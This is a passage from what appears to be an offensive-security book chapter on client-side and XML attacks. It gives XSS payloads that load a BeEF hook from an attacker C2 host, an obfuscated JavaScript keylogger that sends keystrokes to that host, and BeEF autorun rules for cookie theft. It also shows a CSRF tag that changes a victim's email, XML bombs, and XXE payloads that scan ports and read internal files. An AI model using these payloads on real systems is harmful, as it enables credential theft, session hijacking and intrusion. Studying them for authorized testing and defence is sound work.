characters. The browser interpreted the first double-quote as part of
the input field, leading to the vulnerability.
Persistent XSS
A persistent XSS, also called stored XSS, is similar to a reflected
attack in that the input is not sanitized and is eventually reflected
back to a visiting user. The difference, however, is that a persistent
XSS is typically stored in the application's database and presented
to any user visiting the affected page. Stored XSS usually does not
require us to trick the user into visiting the vulnerable page using
a specially crafted URL, and could speed things up if the target user
does not use the application frequently.
The most famous example is Samy Kamkar's MySpace worm from 2005. The JavaScript
payload stored in Samy's profile forced every visiting user's browser to do two things:
Update their profile to include the phrase "but most of all, Samy
is my hero"
Send a friend request to Samy Kamkar's profile
At first glance, this seemed fairly harmless, and the few users who
visited Samy's profile would be mildly annoyed and eventually move
on. What made Samy Kamkar famous, however, was the fact that
the victim's profile was also updated to include the same JavaScript
payload that the victim executed while browsing the infected profile.
This turned the XSS attack into an XSS worm.
Note
A full explanation of how this clever attack was carried out,
including the final payload, can be found on Samy Kamkar's
personal site: https://samy.pl/myspace/tech.html.
DOM-based XSS
This particular type of XSS attack happens when the application's
client-side code reads data from the DOM and uses it in an unsafe
manner.
The best way to illustrate the impact of DOM XSS is with a simple
vulnerable application.
This application will scan the document URL for the position of the
name parameter using the document.URL.indexOf() function. It will
then grab the text starting just after name= using the
document.URL.substring() function and store the value in the name
variable.
The application will then walk the DOM for the span element
welcome. The last line of the script is where the magic happens, also
known as the sink. The application will fill the contents of the span element with
that of the name URL parameter fetched earlier, using the innerHTML
property of the welcome object.
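A minimal reconstruction of such a welcome.html page (the markup and variable names here are assumptions, matching the behavior described above) could look like this:
<html>
  <body>
    Welcome! <span id="welcome"></span>
    <script>
      // Grab everything after "name=" in the URL, with no parsing or sanitization
      var pos = document.URL.indexOf("name=") + 5;
      var name = document.URL.substring(pos);
      // Walk the DOM for the welcome span, then fill it via innerHTML (the sink)
      var welcome = document.getElementById("welcome");
      welcome.innerHTML = name;
    </script>
  </body>
</html>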
Figure 9.5: The DOM is updated to include the name from the URL
The span element in the DOM was updated with the value passed via
the URL and everything looks good. The application provides
dynamic page content without the need for server-side programming.
Another issue with this particular piece of code is that the URL GET
parameters are not safely parsed. It uses string functions to walk the
entire URL and fetch arbitrary data.
Our payload URL to exploit this DOM XSS will look like this:
http://c2.spider.ml/welcome.html#name=<svg/onload=alert(1)>
The application client-side code works just fine and inserts our XSS
payload right into the DOM:
Figure 9.6: DOM-based XSS successfully executing
If we inspect the application server log, we can see that our payload
was never sent over the wire: the malicious <svg> value travels in the
URL fragment (after the # character), which the browser never sends to
the server, so server-side filters and logs never see it.
Cross-Site Request Forgery
As attackers, we've done some digging and realized that the email
application provides a way to update the password recovery email
through the profile page: http://email.site/profile/.
http://email.site/profile/update?email=[email protected]
In our malicious site, we embed an img tag with the source pointing
to the profile update URL containing our email address as the new
value.
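The embedded tag can be as simple as this; the email parameter (shown redacted, as in the URL above) carries our attacker-controlled address, and the image is hidden so a broken icon does not give the attack away:
<img src="http://email.site/profile/update?email=[email protected]" style="display:none">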
When the user visits our malicious site, the image will attempt to load
by making an authenticated GET request to the target application,
updating the recovery email for the victim on the email application.
We now have the ability to request a password reset for the victim's
account and login to the email site directly.
CSRF tokens should be tied to the user session and if that session is
destroyed, the tokens should go with it. If tokens are global,
attackers can generate them on their own accounts and use them to
target others.
First of all, we would submit an XSS payload into our own profile
name and save it for later. Then, we could build a malicious site that
performs the following operations in order:
BeEF
The Browser Exploitation Framework (BeEF) is a great tool that was created by Wade
Alcorn to allow for the easy exploitation of XSS vulnerabilities.
Note
Installing BeEF is straightforward and it is available on GitHub:
https://github.com/beefproject/beef. BeEF is also installed on Kali
Linux by default. Although, in some cases, it's better to have
it running in your C2 server in the cloud.
We can clone the latest version from the GitHub repository using the
git clone command:
root@spider-c2:~# git clone https://github.com/beefproject/beef
The source comes with an install script, which will setup the
environment for us. Inside the beef folder, execute the install script:
root@spider-c2:~/beef# ./install
[WARNING] This script will install BeEF and its
required dependencies (including operating system
packages).
Are you sure you wish to continue (Y/n)? y
[INFO] Detecting OS...
[INFO] Operating System: Linux
[INFO] Launching Linux install...
[INFO] Detecting Linux OS distribution...
[INFO] OS Distribution: Debian
[INFO] Installing Debian prerequisite packages…
[...]
beef:
    [...]
    credentials:
        user: "admin"
        passwd: "peanut butter jelly time"
    [...]
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: "172.217.2.0/24"
        # subnet of IP addresses that can connect to the admin UI
        permitted_ui_subnet: "196.247.56.62/32"
    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "443"
        public: "c2.spider.ml"
        [...]
        https:
            enable: true
            key: "/etc/letsencrypt/live/spider.ml/privkey.pem"
            cert: "/etc/letsencrypt/live/spider.ml/cert.pem"
The root of the configuration file is beef, with indented lines delimiting
subnodes. For example, the path beef.credentials.user would
return the value admin once the configuration file is parsed.
Note
Let's Encrypt provides free domain-validated certificates for
hostnames and even wildcards. More information can be found
at https://letsencrypt.org/.
The BeEF C2 panel is accessible via the URL displayed in the BeEF
launcher output:
https://[beef.http.public]:[beef.http.port]/ui/panel
The user experience is a bit unorthodox but quick to get used to:
Figure 9.10: The BeEF C2 server control panel
On the right-hand side of the hooked browsers' history, you'll find the
landing page (or Getting Started), the C2 server logs (Logs), and
the selected victim's browser control tab (Current Browser). Of
interest is the browser control, which includes sub-tabs for details,
logs, and the modules, or commands.
There are many modules available and some work better than
others. The effectiveness of the module (command) you choose
really depends on the browser version, the victim, and how
technologically savvy they are. In the coming sections, we will look at
the more successful attack modules in an attempt to compromise the
target or harvest credentials.
Hooking
With the BeEF C2 server running in the cloud, we have exposed two
important URLs:
The admin UI: https://c2.spider.ml/ui/panel
The hook script: https://c2.spider.ml/hook.js
If we are trying to hide from the blue team, it may be best to move
this file to something less conspicuous than c2.spider.ml/hook.js,
but for the sake of this chapter, we will hook victims using this URL.
The first option is simple; we can close the value property with a
double-quote and the input element with an angled bracket, followed
by our malicious script tag:
"><script async src=https://c2.spider.ml/hook.js></script><span id="
The resulting HTML code, once the XSS payload is reflected back,
will silently download and execute our hook code, giving us access
to the browsing session. The async keyword will ensure that the hook
is downloaded asynchronously and does not slow down the page
load, which could tip off the victim that something is amiss.
The trailing unfinished <span> will ensure that the remainder of the
original HTML code does not show up on the page, giving it a bit
more of a clean look.
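Another option is to create the script element with JavaScript itself. The dropper, which also appears later inside the eval() payloads, is only three lines:
var hook = document.createElement('script');
hook.src = 'https://c2.spider.ml/hook.js';
document.head.append(hook);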
The first line will create a blank object representing a script tag. Just
as we did with the src= HTML tag property, in JavaScript, we can
point the source of the script to our hook code. At this point, no
actual code is downloaded or executed. We have created a benign
DOM object. To weaponize, we can use the append function to add it
to the document.head, which is to say we create a <script> tag in the
<head> tag of the page. The last line does just this, and the browser
immediately and silently downloads the hook code and executes it.
Again, the trailing x=" property is to make sure there are no HTML
parsing oddities and the code can execute cleanly.
<script>
sure = confirm("Hello [sink], are you sure you
wish to logout?");
if (sure) {
document.location = "/logout";
}
</script>
The prompt() function will return whatever string value we give it,
and alert() will display the concatenated string back to the user.
We can do all kinds of strange things like that with JavaScript, but
what's important to note is that a prompt() function was executed. If
we have control of what is concatenated into a string, we can execute
arbitrary JavaScript code.
<script>
sure = confirm("Hello " + eval("var hook = document.createElement('script');hook.src='xxx.xxx';document.head.append(hook);") + ", are you sure you wish to logout?");
if (sure) {
document.location = "/logout";
}
</script>
We're not really concerned with the end result of the concatenation,
in fact, eval does not return anything meaningful for display. What
we care about is the execution of eval(), which will in turn execute
our hook dropper.
A keen eye will notice that there's a minor issue with this particular
injection. If the user clicks OK in the confirm dialog box, the sure
variable will be set to true and the page will navigate away, taking
down our BeEF hook with it.
The result is valid code that will prevent the if statement from
evaluating to true and changing the document location. We use the
double slash (//) to comment out the rest of the confirm() function,
preventing JavaScript parse errors:
<script>
sure = confirm("Hello "); eval("var hook = document.createElement('script');hook.src='https://c2.spider.ml/hook.js';document.head.append(hook);"); sure = false; //, are you sure you wish to logout?");
if (sure) {
document.location = "/logout";
}
</script>
Injecting JavaScript code in the middle of a function can present
some problems if it is not carefully crafted. HTML is fairly forgiving if
we miss a closing tag or break the rest of the page. Some JavaScript
engines, however, will fail to parse the code and our payload will
never execute.
For the following BeEF scenarios, we will hook the badguys site,
available at http://badguys.local, using the following XSS attack.
This is a much simpler reflected XSS attack, but it should do the trick
to showcase BeEF capabilities:
http://badguys.local/cross-site-scripting/form-field?qs="><script+async+src=https://c2.spider.ml/hook.js></script><span+id="
If successful, the BeEF C2 server log will show the new hooked
browser, the IP address, the browser, the OS, and the domain on
which the XSS payload executed:
Note
Empire is an awesome C2 open-source software that allows full
control of Windows and Linux machines. The Windows agent is
written entirely in PowerShell and can be used to control every
aspect of the target. It is a very effective remote access trojan
(RAT). Linux is also supported via a Python agent. There are a
ton of post-exploitation modules and Empire is easily deployed in
the cloud. More information can be found
at https://www.powershellempire.com/.
Clicking Execute in the Fake Flash Update command will pop up the
fake message in the victim's browser:
Figure 9.12: The Fake Flash Update command in action
Note
Hovering over the image will show the
http://c2.spider.ml/FlashUpdate.bat link that we configured
earlier in the Fake Flash Update command.
With a little help from the XSS attack, we were able to trick our victim
into executing our malware and letting us escalate privileges from in-
browser to having full control over the victim's machine.
The keylogger
A common use for XSS attacks is the old-fashioned keylogger.
JavaScript allows us to capture keystrokes very easily, and since we
have access to execute arbitrary JavaScript code in the browser, we
can set up a keystroke logger as well. You can imagine that XSS in a
login page could be very valuable to attackers.
We can see what looks like credentials typed into the hooked
application. The words will be split up because of the frequency with
which the BeEF hook calls home and submits the captured key
buffer. In most cases, it is fairly obvious what the user is typing in.
The built-in keylogger is fairly good and most attacks will benefit from
it. However, in certain situations, a more custom keylogger may be
required. Perhaps we want to send the keys to some other location,
or just want to record more keystrokes, such as Backspace, Enter,
and Tab.
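Our custom keylogger is only a few lines of JavaScript. Decoded from the Base64 payload used with the Raw JavaScript module later in this chapter, the first half defines the collection URL and registers a keydown handler that feeds a buffer:
var push_url = "http://c2.spider.ml/log.php?session=";

var buffer = [];
document.addEventListener("keydown", function(e) {
    key = e.key;
    if (key.length > 1 || key == " ") { key = "[" + key + "]" }
    buffer.push(key);
});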
When this event does fire, we store the pressed key inside a buffer
to be later submitted to the keylogging server. The if statement
within this keydown handler function will wrap special keys with
brackets to make it easier for us to read. For example: the
keystrokes Enter, Space, and Tab would be recorded as [Enter],
[Space], [Tab], respectively.
The last bit of code will execute a function every couple of seconds
(every 2,000 milliseconds) and is responsible for submitting the
current buffer to the defined push_url:
window.setInterval(function() {
    if (buffer.length > 0) {
        var data = encodeURIComponent(btoa(buffer.join('')));

        var img = new Image();
        img.src = push_url + data;

        buffer = [];
    }
}, 2000);
We can start the built-in PHP server on port 80 to serve the log.php
file for our JavaScript keylogger to communicate with:
root@spider-c2-1:~# php -S 0.0.0.0:80
All that's left is to push the JavaScript payload through BeEF to our
hooked target using the Raw JavaScript command under the Misc
node:
[Tab]administrator[Tab][Shift]Winter2018[Enter]
[Shift]Hi[ ][Shift]Jm[Backspace]im,[Enter][Enter]
[Shift]Please[ ]find[ ]attached[ ]the[ ]reports[
]from[ ]last[ ]quarter.[Enter][Enter]
There are no options to set for this one; we just have to execute and
everything is taken care of.
Automatic exploitation
All these modules are great, but XSS attacks are typically time-
sensitive. If we successfully trick the user into executing our BeEF
hook, we may not have enough time to click through the user
interface and run any modules before they close the page or browse
to some other part of the application. This is where BeEF's Autorun
Rule Engine (ARE) comes in: it runs the modules we choose
automatically, as soon as a victim's browser is hooked.
Note
More information on ARE can be found at
https://github.com/beefproject/beef/wiki/Autorun-Rule-Engine.
BeEF comes with a few sample rules that allow you to execute
modules such as Get Cookie or Ping Sweep, but they are not turned
on by default. If we wish to execute them as soon as the victim is
hooked, we have to place the respective JSON files inside the
arerules/enabled subdirectory and restart BeEF.
The Get Cookie ARE rule looks like this:
root@spider-c2-1:~/beef# cat
arerules/get_cookie.json
{
"name": "Get Cookie",
"author": "@benichmt1",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_cookie",
"condition": null,
"options": {
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
There's some metadata, such as name and author. The ARE rule can
also specify any associated options it may need to execute
successfully. We can define an execution order and also add a delay.
The chain_mode field refers to the method used to run the
modules, but the default sequential mode should work just fine in most
deployments.
Note
More information on chaining modes and writing ARE can be
found at https://github.com/beefproject/beef/wiki/Autorun-Rule-
Engine.
root@spider-c2-1:~/beef# cp
arerules/man_in_the_browser.json
arerules/enabled/man_in_the_browser.json
root@spider-c2-1:~/beef# cp
arerules/get_cookie.json
arerules/enabled/get_cookie.json
For the ARE to load the newly enabled rules, we'd have to restart
BeEF if it is already running:
root@spider-c2-1:~/beef# ./beef
[...]
[18:07:19][*] RESTful API key:
cefce9633f9436202c1705908d508d31c7072374
[18:07:19][*] HTTP Proxy: http://127.0.0.1:6789
[18:07:19][*] [ARE] Ruleset (Perform Man-In-The-
Browser) parsed and stored successfully.
[18:07:19][*] [ARE] Ruleset (Get Cookie) parsed
and stored successfully.
[18:07:19][*] BeEF server started (press control+c
to stop)
BeEF will perform an MITB attack and extract the application cookies
as soon as the victim visits the infected page. The Man-In-The-
Browser module will keep the hook alive if the victim decides to click
around the application. The Get Cookie module will hopefully
exfiltrate session cookies in case they decide to close the browser
altogether.
As you may have guessed, we can also automatically run the Raw
Javascript module, which will allow us to execute arbitrary JavaScript
as soon as a hooked browser comes online. A good candidate for
this is our custom keylogger.
First, we have to create a rule that will instruct BeEF to execute the
raw_javascript module:
root@spider-c2-1:~/beef# cat
arerules/enabled/raw_javascript.json
{
"name": "Raw JavaScript",
"author": "[email protected]",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "raw_javascript",
"condition": null,
"options": {
"cmd": ""
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
The Raw JavaScript command input will look something like this:
eval(atob('dmFyIHB1c2hfdXJsID0gImh0dHA6Ly9jMi5zcGl
kZXIubWwvbG9nLnBocD9zZXNzaW9uPSI7Cgp2YXIgYnVmZmVyI
D0gW107CmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoImtleWR
vd24iLCBmdW5jdGlvbihlKSB7CiAgICBrZXkgPSBlLmtleTsKI
CAgIGlmIChrZXkubGVuZ3RoID4gMSB8fCBrZXkgPT0gIiAiKSB
7IGtleSA9ICJbIiArIGtleSArICJdIiB9CiAgICBidWZmZXIuc
HVzaChrZXkpOwp9KTsKCndpbmRvdy5zZXRJbnRlcnZhbChmdW5
jdGlvbigpIHsKICAgIGlmIChidWZmZXIubGVuZ3RoID4gMCkge
wogICAgICAgIHZhciBkYXRhID0gZW5jb2RlVVJJQ29tcG9uZW5
0KGJ0b2EoYnVmZmVyLmpvaW4oJycpKSk7CgogICAgICAgIHZhc
iBpbWcgPSBuZXcgSW1hZ2UoKTsKICAgICAgICBpbWcuc3JjID0
gcHVzaF91cmwgKyBkYXRhOwoKICAgICAgICBidWZmZXIgPSBbX
TsKICAgIH0KfSwgMjAwMCk7'));
Finally, we can add this value to our Raw JavaScript ARE rule JSON
file. This particular module expects a cmd option to be set, and this is
where we put our one-liner.
root@spider-c2-1:~/beef# cat
arerules/enabled/raw_javascript.json
{
"name": "Raw JavaScript",
"author": "[email protected]",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "raw_javascript",
"condition": null,
"options": {
"cmd":
"eval(atob('dmFyIHB1c2hfdXJsID0gImh0dHA6Ly9jMi5zcG
lkZXIubWwvbG9nLnBocD9zZXNzaW9uPSI7Cgp2YXIgYnVmZmVy
ID0gW107CmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoImtleW
Rvd24iLCBmdW5jdGlvbihlKSB7CiAgICBrZXkgPSBlLmtleTsK
ICAgIGlmIChrZXkubGVuZ3RoID4gMSB8fCBrZXkgPT0gIiAiKS
B7IGtleSA9ICJbIiArIGtleSArICJdIiB9CiAgICBidWZmZXIu
cHVzaChrZXkpOwp9KTsKCndpbmRvdy5zZXRJbnRlcnZhbChmdW
5jdGlvbigpIHsKICAgIGlmIChidWZmZXIubGVuZ3RoID4gMCkg
ewogICAgICAgIHZhciBkYXRhID0gZW5jb2RlVVJJQ29tcG9uZW
50KGJ0b2EoYnVmZmVyLmpvaW4oJycpKSk7CgogICAgICAgIHZh
ciBpbWcgPSBuZXcgSW1hZ2UoKTsKICAgICAgICBpbWcuc3JjID
0gcHVzaF91cmwgKyBkYXRhOwoKICAgICAgICBidWZmZXIgPSBb
XTsKICAgIH0KfSwgMjAwMCk7'));"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
Each module will require its own specific options to run properly.
BeEF is an open-source software, so we can inspect the code to
figure out what these options are:
Figure 9.18: BeEF GitHub source code
Restarting BeEF will load our new ARE rule alongside the other two
canned rules:
root@spider-c2-1:~/beef# ./beef
[...]
[18:07:19][*] RESTful API key:
cefce9633f9436202c1705908d508d31c7072374
[18:07:19][*] HTTP Proxy: http://127.0.0.1:6789
[18:07:19][*] [ARE] Ruleset (Perform Man-In-The-
Browser) parsed and stored successfully.
[18:07:19][*] [ARE] Ruleset (Get Cookie) parsed
and stored successfully.
[18:07:19][*] [ARE] Ruleset (Raw JavaScript)
parsed and stored successfully.
[18:07:19][*] BeEF server started (press control+c
to stop)
All new hooked victims will have their cookies exfiltrated, a custom
keylogger executed, and persistence enabled via the MITB attack.
Tunneling traffic
Perhaps the coolest feature in BeEF is the ability to tunnel your
traffic through the hooked victim's browser. BeEF will set up a local
proxy that will forward web requests through the C2 and back out to
the victim.
root@spider-c2-1:~/beef# ./beef
[...]
[18:07:19][*] RESTful API key:
cefce9633f9436202c1705908d508d31c7072374
[18:07:19][*] HTTP Proxy: http://127.0.0.1:6789
We can see this traffic proxy in action by using curl and specifying
the default BeEF proxy service (127.0.0.1:6789) using the -x
parameter:
[...]
</html>
root@spider-c2-1:~#
Note
Remember that SOP applies when tunneling traffic as well. We
can send requests to arbitrary domains and ports, but we cannot
read the contents of the response:
root@spider-c2-1:~# curl -x 127.0.0.1:6789
http://example.com
ERROR: Cross Domain Request. The request was
sent howev
er it is impossible to view the response.
root@spider-c2-1:~#
Summary
In this chapter, we covered lots of information relating to client-side
attacks. We looked at the three most common types of XSS:
reflected, stored, and DOM, as well as CSRF, and chaining these
attacks together. We also covered the SOP and how it affects
loading third-party content or attack code onto the page.
The purpose of this chapter was to show that client-side attacks can
be practical in a real-world attack. Even though we are not executing
native code, XSS and CSRF attacks can be combined to do some
real damage to targets. In the next chapter, we will switch gears from
attacking users to attacking the server itself, by way of XML.
Chapter 10. Practical Server-
Side Attacks
In the previous chapter, we went through a series of practical attacks
against users, leveraging application vulnerabilities to achieve our
goal. The focus of this chapter will be server-side attacks, primarily
by exploiting XML vulnerabilities. Despite the fact that JSON has
gained a large market share of data exchange in web applications,
XML is still fairly prevalent. It's not as clean as JSON and can
be a bit harder to read, but it is mature. There are a ton of XML-
parsing libraries for any language a developer may choose to
complete a project with. Java is still popular in the enterprise world
and the Android phenomenon has only spawned more Java
enthusiasts. Microsoft is still very fond of XML and you'll find it all
over its operating system, in the application manifests, and in IIS
website configuration files.
The goal of this chapter is to get you comfortable with XML attacks
and, by the end, you will be familiar with:
DoS conditions
Server-Side Request Forgery (SSRF) attacks
Information leaks
Blind exploitation and out-of-band exfiltration of data
Remote code execution
On your travels, you no doubt have come across XML and, at first
glance, it looks similar to HTML. There's a header that describes the
document and it typically looks like this:
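For example, the header on the first line, followed by a simple user record:
<?xml version="1.0" encoding="UTF-8"?>
<user>
  <name>Dade Murphy</name>
  <id>1</id>
  <email type="local">admin@localhost</email>
</user>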
The <user> element indicates the type of record and its boundary is
</user>, much like HTML. This is also the root element. Within this
record, we have <name>, <id>, and <email> entries with the
appropriate values. It's important to note that any application that
parses this data must know what to do with the contents. Modern
web browsers know what to do with HTML's <div> and <a> because
they all follow a standard. Applications exchanging XML data must
agree on what that data is, and how it is processed or rendered. An
XML structure can be valid from a syntax point of view (that is, all the
tags are properly closed, there's a root element, and the document
header is present), but it may be missing expected elements and
applications may crash or waste resources attempting to parse the
data.
Internal DTDs can be found near the top of the XML document, in
the DOCTYPE tag:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ELEMENT user ANY>
<!ENTITY company "Ellingson Mineral Company">
]>
<user>
<name>Dade Murphy</name>
<id>1</id>
<email type="local">admin@localhost</email>
<company>&company;</company>
</user>
The preceding internal DTD defines the user root element and an
internal entity, company, which is defined to hold the string value
"Ellingson Mineral Company". Within the document itself, the
company entity can be referenced using the ampersand and
semicolon wrappers, which should look familiar if you have some
HTML experience. When the parser reaches the &company; string, it
will insert the value defined in the preceding DTD.
The user.dtd file will contain our entity and element definitions:
<!DOCTYPE user [
<!ELEMENT user ANY>
<!ENTITY company "Ellingson Mineral Company">
]>
The company entity will be expanded, as before, once the DTD is
successfully downloaded and parsed.
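The XML document itself then references the externally hosted DTD instead of defining everything inline; a sketch, assuming user.dtd is served from config.ecorp.local, looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user SYSTEM "http://config.ecorp.local/user.dtd">
<user>
  <name>Dade Murphy</name>
  <id>1</id>
  <email type="local">admin@localhost</email>
  <company>&company;</company>
</user>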
We can pass this XML document to a parser as part of, say, an API
authentication request. When it's time to resolve the &company; entity,
the parser will make an HTTP connection to config.ecorp.local and
the contents will be echoed in the <company> element.
A billion laughs
The billion laughs attack, also known as an XML bomb, is a DoS
attack that aims to overload the XML parser by causing it to allocate
more memory than it has available with a relatively small input buffer.
On older systems, or virtual machines with limited memory, a parser
bomb could quickly crash the application or even the host.
The XML bomb exploits the fact that file formats such as XML allow
the user to specify references or pointers to other arbitrarily defined
data. In the earlier examples, we used entity expansion to replace
&company; with data defined either in the header of the document or
somewhere externally.
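The classic payload, abbreviated here (the intermediate entities follow the same pattern), looks like this:
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  [...]
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>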
A parser will look at this data and begin expanding the entities,
starting with the <lolz> root element. A reference to the &lol9; entity
will point to 10 other references defined by &lol8;. This is repeated
until the first entity, &lol;, expands to the "lol" string. The result is
the memory allocation of 10^9 (1,000,000,000) instances of the
"lol" string, or a billion lols. This alone can take up to 3 GB of
memory, depending on the parser and how it handles strings in
memory. On modern servers, the impact may be minimal, unless this
attack is distributed through multiple connections to the application.
Note
As always, take care when testing for these types of
vulnerabilities on client systems. DoS attacks are not usually
allowed during engagements. On rare occasions where DoS is
allowed, an XML bomb may be a good way to tie up resources in
the blue team while you focus on other parts of the network,
provided the system is not business-critical.
XML is not the only file format that allows for this type of DoS attack.
In fact, any language that has constructs for creating pointers to
other data can be abused in a similar fashion. YAML, a human-
readable file format typically used in configuration files, also allows
for pointers to data and thus the YAML bomb:
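A YAML bomb uses anchors (&) and aliases (*) to achieve the same exponential expansion, abbreviated here:
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
[...]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h,*h]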
Request forgery
A request forgery attack occurs when an application is coerced into
making a request to another host or hosts of the attacker's choosing.
External entity expansion attacks are a form of SSRF, as they coerce
the application into connecting to arbitrary URLs in order to
download DTDs or other XML data.
Note
For the sake of this demo, our application will be accessible via
http://xml.parser.local.
Figure 10.4: Vulnerable PHP XML parser running
From the Burp menu, select the Burp Collaborator client option:
Figure 10.5: Starting the Burp Collaborator client module
Collaborator will generate a unique hostname for our payload to call back to, such as:
gl50wfrstsbfymbxzdd454v2ut0jo8.burpcollaborator.net
We will now build an XML document that fetches the publisher value
from the Burp Collaborator host we've just generated. We hope that
when the vulnerable application attempts to fetch the external
content, Burp Collaborator will be able to intercept the request and
confirm the vulnerability:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE book [
  <!ELEMENT book ANY >
  <!ENTITY publisher SYSTEM "http://gl50wfrstsbfymbxzdd454v2ut0jo8.burpcollaborator.net/publisher.xml">
]>
<book>
  <title>The Flat Mars Society</title>
  <publisher>&publisher;</publisher>
  <author>Elon Musk</author>
</book>
Note
Collaborator is not required for this confirmation. We can use
a simple HTTP server running on our C2 server somewhere in
the cloud. Collaborator is useful when HTTPS is needed in a
rush, or if confirmation has to be done via DNS or some other
protocol.
We can see that the &publisher; entity was resolved by the parser,
which means the application made an external HTTP connection to
our Collaborator instance. It's interesting to note that the HTML
response was successfully interpreted as XML by the parser, due to
the structural similarity of XML and HTML:
<html>
<body>[content]</body>
</html>
Polling the Collaborator server from the client confirms the existence
of this vulnerability and now we know we can influence the server in
some way:
Figure 10.8: Collaborator client confirms SSRF vulnerability
Since we are forging our request to come from the vulnerable XML
parser application, all port scan attempts will appear to come from an
internal trusted system. This is good from a stealth perspective, and
in some cases, can avoid triggering alarms.
The XML code we'll use for our XXE port scanner will target the
10.0.5.19 internal host, looking for interesting services: 8080, 80, 443,
22, and 21:
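A sketch of that payload, with one external entity per port of interest (the root element name is arbitrary):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE scan [
  <!ELEMENT scan ANY>
  <!ENTITY port1 SYSTEM "http://10.0.5.19:8080/">
  <!ENTITY port2 SYSTEM "http://10.0.5.19:80/">
  <!ENTITY port3 SYSTEM "http://10.0.5.19:443/">
  <!ENTITY port4 SYSTEM "http://10.0.5.19:22/">
  <!ENTITY port5 SYSTEM "http://10.0.5.19:21/">
]>
<scan>&port1;&port2;&port3;&port4;&port5;</scan>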
Once uploaded to the application for parsing, the payload will force
the XML parser into systematically connecting to each specified port,
in an attempt to fetch data for the &portN; entities:
Figure 10.9: XXE port scanner showing error messages for open ports
Burp Suite has a neat feature where it allows us to copy any request
captured as a curl command. If we wish to repeat this attack on
another internal host and perhaps parse the response for another
tool, we can quickly copy the payload with a single click:
The generated curl command can be piped to grep and we can filter
only lines containing "http:" to make reading the output a bit
cleaner:
Information leak
XXE can also be used to read any file on disk that the application
has access to. Of course, most of the time, the more valuable files
are the application's source code, which is a common target for
attackers. Remember that external entities are accessed using a
URL, and in PHP, the file system is accessible via the file:// URL
prefix.
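A sketch of the payload, reusing the earlier book document but pointing the entity at a local file:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE book [
  <!ELEMENT book ANY>
  <!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<book>
  <title>The Flat Mars Society</title>
  <publisher>&passwd;</publisher>
  <author>Elon Musk</author>
</book>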
The result is predictable and a good proof of concept for our report to
the client. The XML parser will reach out over the file:// scheme,
grab the contents of /etc/passwd, and display them on the screen:
Figure 10.11: Exploiting XXE to retrieve /etc/passwd
Local files are not the only thing we can touch with this exploit,
however. SSRF attacks, such as XXE, can also be used to target
internal applications that may not be accessible from an outside
network, such as other virtual local area networks (VLANs) or the
internet.
Note
The internal application running on 10.0.5.19 that we will use for
demonstration purposes is the awesome badguys project from
Mike Pirnat. The web application code can be downloaded from
https://github.com/mpirnat/lets-be-bad-guys.
http://10.0.5.19/user-pic?p=[LFI]
To grab this file's contents, our XML payload will look something like
this:
We can use the same LFI attack to grab its contents as well.
There is one problem with just changing the p path to the database
file:
http://10.0.5.19/user-pic?
p=../../../../../../db/badguys.sqlite3
In normal LFI situations, this will work just fine. We traverse enough
directories to reach the root of the drive, change directory to db, and
fetch the badguys.sqlite3 file.
SQLite 3's file format will contain characters that most XML parsers
will have a problem processing, and therefore parse errors may
prevent us from grabbing the contents.
To get around this issue, ideally, we want the XML parser to encode
the data it retrieves from the vulnerable internal application before it
injects it into the <xxe> tag for processing.
php://filter/convert.base64-encode/resource=[URL]
php://filter/convert.base64-encode/resource=http://10.0.5.19/user-pic?p=../../../../../../db/badguys.sqlite3
Figure 10.14: Repeating the attack using the PHP Base64 filter modification
We can now run the Base64 response through CyberChef with the
option of saving the decoded data to a file:
Figure 10.15: SQL database extracted from an internal host
Note
CyberChef is a great tool for data manipulation, available online
or for download from GCHQ at https://gchq.github.io/CyberChef/.
Blind XXE
As you have probably witnessed in your day-to-day role, not all XML
parsers are as verbose as the preceding example. Many web
applications are configured to suppress errors and warnings, and
sometimes will not echo any useful data back to you. The preceding
attacks relied on the fact that the payload was processed and the
entities were echoed out to the screen. This allowed us to exfiltrate
the data easily.
Figure 10.16: The modified PHP XML parser does not return data
What if, instead of instructing the XML parser to return the data we
need with the <xxe>&exfil;</xxe> tag, we take an out-of-band
approach? Since we cannot return data in the browser, we can ask
the parser to connect to a C2 server and append the data to the
URL. This will allow us to retrieve the contents by analyzing the
C2 server's access logs.
A keen eye will notice the new percent character preceding the entity
names. This denotes a parameter entity as opposed to a general
entity, as we've used so far. General entities can be referenced
somewhere in the root element tree, while parameter entities can be
referenced in the DTD or the header of the document:
The next step is to try these two entities in our previous payload:
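Reconstructed from the xmllint errors shown below, and assuming the target is again /etc/passwd, Base64-encoded with the php:// filter, payload.xml looks roughly like this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
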